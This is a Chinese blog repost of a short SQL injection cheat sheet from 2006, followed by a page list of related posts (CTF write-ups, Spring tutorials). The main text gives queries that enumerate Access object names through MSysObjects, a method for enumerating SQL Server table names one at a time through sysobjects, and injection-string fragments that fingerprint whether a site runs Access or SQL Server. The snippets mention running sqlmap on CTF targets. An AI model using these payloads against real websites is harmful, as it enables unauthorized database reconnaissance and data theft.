我的注入方法之个人见解!

转载 2006年06月07日 09:52:00
使用直接的查询语句获取ACCESS数据库中的表名/窗体/报表/模块/查询/宏
---------------------------------------------------------------------------
查询:
SELECT MSysObjects.Name FROM MsysObjects WHERE (Left([Name],1)<>"~") AND (MSysObjects.Type)=5 ORDER BY MSysObjects.Name; 

窗体:
SELECT MSysObjects.Name FROM MsysObjects WHERE (Left([Name],1)<>"~") AND (MSysObjects.Type)=-32768 ORDER BY MSysObjects.Name; 

表:
SELECT MSysObjects.Name FROM MsysObjects WHERE (Left([Name],1)<>"~") AND (Left$([Name],4) <> "Msys") AND (MSysObjects.Type)=1 ORDER BY MSysObjects.Name; 

报表:
SELECT MSysObjects.Name FROM MsysObjects WHERE (Left([Name],1)<>"~") AND (MSysObjects.Type)= -32764 ORDER BY MSysObjects.Name; 

模块:
SELECT MSysObjects.Name FROM MsysObjects WHERE (Left([Name],1)<>"~") AND (MSysObjects.Type)= -32761 ORDER BY MSysObjects.Name; 

宏:
SELECT MSysObjects.Name FROM MsysObjects WHERE (Left([Name],1)<>"~") AND (MSysObjects.Type)= -32766 ORDER BY MSysObjects.Name;

使用直接的查询语句获取SQL数据库表名的方法
-----------------------------------------------------------------------
我们马上就可以得到该数据库下用户表的第一个表名gallery的对象标志2099048
select top 1 name from sysobjects where xtype=u and id>2099048
再得到第2个表名gb_data,这里用到的是id>2099048,因为对象标志id是根据由小到大排列的
以此类推,我们可以得到所有的用户表的名字了

使用数据库的系统表对象来判断网站中使用的是何种数据库格式(SQL/ACCESS)
-----------------------------------------------------------------------
我们可以在注入串中加上一个查询语句:
(select count(*) from sysobjects)>=0
如果查询结果成立,即是使用SQL数据库的,反之否.

加以下语句可判断是否为ACCESS:
(select count(*) from Msysaccessobjects)>=0
如果查询结果成立,即是ACCESS数据库,反之否.

SPRING.NET 1.3.2 学习5--依赖注入

1.使用属性依赖注入:XML C#public class ExampleObject { private AnotherObject obje...
  • lee576
  • lee576
  • 2013年03月01日 15:27
  • 1815

实验吧简单的sql注入之3WP

就上图不说话(sqlmap) 这种题目对于初学sqlmap的人还是很好玩的...
  • yalecaltech
  • yalecaltech
  • 2017年03月19日 21:15
  • 731

实验吧WEB--简单的sql注入之3

1 题目 2 瞎测试一下 id=1-3都回显内容 发现半角‘ 报错3 上神器sqlmap sqlmap -u "http://ctf5.shiyanbar.com/web/i...
  • claygrit
  • claygrit
  • 2017年10月29日 14:17
  • 247

实验吧 ctf 题目简单的sql注入2writeup

解题链接: http://ctf5.shiyanbar.com/web/index_2.php 1.输入id值,通过回显发现题目应该是进行了空格过滤 2.使用sqlmap进行注入    2.1 ...
  • ZweLL032
  • ZweLL032
  • 2017年03月11日 21:47
  • 3696

实验吧 ctf 简单的sql注入3

ctf题 现在自己还是个小白 以后慢慢做题得出思路吧
  • ZweLL032
  • ZweLL032
  • 2017年03月11日 22:18
  • 4229

Spring之构造注入与设值注入

Spring之构造注入与设值注入        Spring学了好久了,但是一直没时间总结,总是断断续续的,这段时间打算重新做下Spring这方面的功课。       这几天闲着没事赶紧做做总结...
  • zhangdongxuan
  • zhangdongxuan
  • 2015年07月17日 10:55
  • 707

第一篇博客--谈java相关(个人见解)

小白的个人见解,如有不当之处,还望不吝赐教,不喜勿喷。
  • qq_31763083
  • qq_31763083
  • 2016年12月22日 10:49
  • 140

白话Spring(基础篇)---方法注入与方法替换

[一知半解,就是给自己挖坑] 本文我们将来介绍Spring中方法的注入与替换。按照惯例,首先我们来准备一下我们的开发环境: a.操作系统:win7 x64 b.开发工具:eclipse mars...
  • ABCD898989
  • ABCD898989
  • 2016年03月01日 20:07
  • 2478

对于java的个人见解

完成项目后,我开始研究Java Pet Store了,很是过瘾。开始知道了Servlet过滤器,XML方面较为全面的知识,知道了J2EE整个框架中各种技术的实际应用。慢慢的,开始研究WebLogic配...
  • e0b5r595
  • e0b5r595
  • 2014年08月27日 10:30
  • 341

《Linux那些事儿之我是USB》前言

1992年,那是一个春天。不过其实1991年又何尝不是一个春天呢,因为正是在那一年,Linux诞生了。又因为开放源代码的缘故,十几年来Linux是越来越火,熊熊火焰也烧到了华夏大地。诸多高校开始开设L...
  • fudan_abc
  • fudan_abc
  • 2010年07月29日 12:34
  • 17614
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:我的注入方法之个人见解!
举报原因:
原因补充:

(最多只允许输入30个字)